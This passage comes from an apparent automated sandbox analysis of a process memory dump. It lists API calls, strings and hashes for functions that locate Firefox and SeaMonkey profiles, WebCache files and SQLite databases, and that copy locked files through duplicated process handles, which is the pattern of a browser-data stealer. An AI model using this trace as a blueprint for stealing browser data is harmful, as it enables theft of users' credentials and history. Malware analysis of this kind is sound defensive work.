                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 00403F6B
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                • API String ID: 3527940856-2068335096
                                • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                APIs
                                • memset.MSVCRT ref: 00403FE1
                                • memset.MSVCRT ref: 00403FF6
                                • memset.MSVCRT ref: 0040400B
                                • memset.MSVCRT ref: 00404020
                                • memset.MSVCRT ref: 00404035
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                  • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                  • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                  • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                • memset.MSVCRT ref: 004040FC
                                  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                  • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                • API String ID: 3527940856-3369679110
                                • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                • API String ID: 3510742995-2641926074
                                • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                  • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                  • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 004033B7
                                • memcpy.MSVCRT ref: 004033D0
                                • wcscmp.MSVCRT ref: 004033FC
                                • _wcsicmp.MSVCRT ref: 00403439
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                • String ID: $0.@
                                • API String ID: 3030842498-1896041820
                                • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                APIs
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 2941347001-0
                                • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                APIs
                                • memset.MSVCRT ref: 00403C09
                                • memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                  • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                • wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                  • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                  • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                • wcscat.MSVCRT ref: 00403C70
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcscat$Closewcscpywcslen
                                • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                • API String ID: 3249829328-1174173950
                                • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                APIs
                                • memset.MSVCRT ref: 0040A824
                                • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                • wcscpy.MSVCRT ref: 0040A854
                                • wcscat.MSVCRT ref: 0040A86A
                                • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 669240632-0
                                • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                APIs
                                • wcschr.MSVCRT ref: 00414458
                                • _snwprintf.MSVCRT ref: 0041447D
                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: PrivateProfileString$Write_snwprintfwcschr
                                • String ID: "%s"
                                • API String ID: 1343145685-3297466227
                                • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressHandleModuleProcProcessTimes
                                • String ID: GetProcessTimes$kernel32.dll
                                • API String ID: 1714573020-3385500049
                                • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                APIs
                                • memset.MSVCRT ref: 004087D6
                                  • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                  • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                • memset.MSVCRT ref: 00408828
                                • memset.MSVCRT ref: 00408840
                                • memset.MSVCRT ref: 00408858
                                • memset.MSVCRT ref: 00408870
                                • memset.MSVCRT ref: 00408888
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                • String ID:
                                • API String ID: 2911713577-0
                                • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcmp
                                • String ID: @ $SQLite format 3
                                • API String ID: 1475443563-3708268960
                                • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                APIs
                                  • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                • memset.MSVCRT ref: 00414C87
                                • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                • wcscpy.MSVCRT ref: 00414CFC
                                  • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                Strings
                                • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressCloseProcVersionmemsetwcscpy
                                • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                • API String ID: 2705122986-2036018995
                                • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: _wcsicmpqsort
                                • String ID: /nosort$/sort
                                • API String ID: 1579243037-1578091866
                                • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                APIs
                                • memset.MSVCRT ref: 0040E60F
                                • memset.MSVCRT ref: 0040E629
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Strings
                                • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                • API String ID: 3354267031-2114579845
                                • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                APIs
                                • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                • LockResource.KERNEL32(00000000), ref: 004148EF
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindLoadLockSizeof
                                • String ID:
                                • API String ID: 3473537107-0
                                • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                APIs
                                Strings
                                • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
                                • String ID: only a single result allowed for a SELECT that is part of an expression
                                • API String ID: 2221118986-1725073988
                                • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                APIs
                                • Sleep.KERNEL32(00000064), ref: 004175D0
                                • FindCloseChangeNotification.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ChangeCloseFindNotificationSleep
                                • String ID: }A
                                • API String ID: 1821831730-2138825249
                                • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@DeleteObject
                                • String ID: r!A
                                • API String ID: 1103273653-628097481
                                • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                APIs
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@
                                • String ID:
                                • API String ID: 1033339047-0
                                • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                APIs
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                  • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                • memcmp.MSVCRT ref: 00444BA5
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$memcmp
                                • String ID: $$8
                                • API String ID: 2808797137-435121686
                                • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                APIs
                                  • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                  • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                  • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                  • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                  • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                  • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                  • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                  • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                  • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                  • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                  • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                  • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                  • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                  • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                  • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                • String ID:
                                • API String ID: 1042154641-0
                                • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                APIs
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                  • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                  • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                • memset.MSVCRT ref: 00403A55
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
